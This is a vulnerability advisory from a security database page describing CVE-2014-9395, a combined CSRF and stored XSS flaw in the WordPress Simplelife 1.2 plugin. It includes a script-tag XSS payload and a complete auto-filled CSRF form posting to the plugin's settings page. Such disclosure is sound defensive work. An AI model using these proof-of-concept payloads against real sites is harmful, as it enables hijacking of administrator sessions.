Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
WordPress Simplelife 1.2 CSRF / XSS
2014.12.19
Credit:
Manideep K
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2014-9395
CWE:
CWE-79
CWE-352
Ogólna skala CVSS:
6.8/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
************************************************************************************** # Title: CSRF / Stored XSS Vulnerability in Simplelife Wordpress Plugin # Author: Manideep K # CVE-ID: CVE-2014-9395 # Plugin Homepage: https://wordpress.org/plugins/simplelife/ # Version Affected: 1.2 (probably lower versions) # Severity: High # Description: Vulnerable Parameter: multiple fields such as simplehoverback, simplehovertext , flickrback etc Vulnerability Class: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29 Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) # About Vulnerability: This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admins browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. # Steps to Reproduce: (POC): After installing the plugin 1. Goto settings -> SimpleLife 2. Insert this payload "><script>alert(32)</script> into background/text/ border fields anywhere Update options and see XSS in action 3. Visit settings page of this plugin anytime later and you can see the script executing as it is stored. Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://localhost/wordpress/wp-admin/options-general.php?page=simplelife.php" method="POST"> <input type="hidden" name="simple_flimit" value="csrf baby " /> <input type="hidden" name="simple_cache" value="0" /> <input type="hidden" name="simple_time" value="H:i" /> <input type="hidden" name="simple_date" value="M jS" /> <input type="hidden" name="simple_tz" value="" /> <input type="hidden" name="simplehoverback" value="hi" /> <input type="hidden" name="simplehovertext" value="hi" /> <input type="hidden" name="simple_hoverborder" value="hi" /> <input type="hidden" name="s_flickr" value="" /> <input type="hidden" name="flickrback" value="csrf baby" /> <input type="hidden" name="flickrtext" value="" /> <input type="hidden" name="s_delicious" value="" /> <input type="hidden" name="delback" value="" /> <input type="hidden" name="deltext" value="" /> <input type="hidden" name="s_blog" value=" " /> <input type="hidden" name="blogback" value="" /> <input type="hidden" name="blogtext" value="" /> <input type="hidden" name="blogico" value="blog.gif" /> <input type="hidden" name="s_twitter" value=" " /> <input type="hidden" name="twitback" value="" /> <input type="hidden" name="twittext" value="" /> <input type="hidden" name="s_lastfm" value="" /> <input type="hidden" name="lastback" value="" /> <input type="hidden" name="lasttext" value="" /> <input type="hidden" name="s_facebook" value="" /> <input type="hidden" name="faceback" value="" /> <input type="hidden" name="facetext" value="" /> <input type="hidden" name="simple_feed1" value="" /> <input type="hidden" name="simple_back1" value="" /> <input type="hidden" name="simple_text1" value="" /> <input type="hidden" name="simple_ico1" value="" /> <input type="hidden" name="simple_feed2" value="" /> <input type="hidden" name="simple_back2" value="" /> <input type="hidden" name="simple_text2" value="" /> <input type="hidden" name="simple_ico2" value="" /> <input type="hidden" name="simple_feed3" value="" /> <input type="hidden" name="simple_back3" value="" /> <input type="hidden" name="simple_text3" value="" /> <input type="hidden" name="simple_ico3" value="" /> <input type="hidden" name="simple_feed4" value="" /> <input type="hidden" name="simple_back4" value="" /> <input type="hidden" name="simple_text4" value="" /> <input type="hidden" name="simple_ico4" value="" /> <input type="hidden" name="info_update" value="Update Options »" /> <input type="submit" value="Submit request" /> </form> </body> </html> # Mitigation: Plugin Closed # Disclosure: 2014-11-06: Author notification 2014-11-20: WP Team action taken by closing the plugin as there is no response from author 2014-12-09: Public Disclosure # Credits: Manideep K Information Security Researcher https://in.linkedin.com/in/manideepk ***************************************************************************************
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top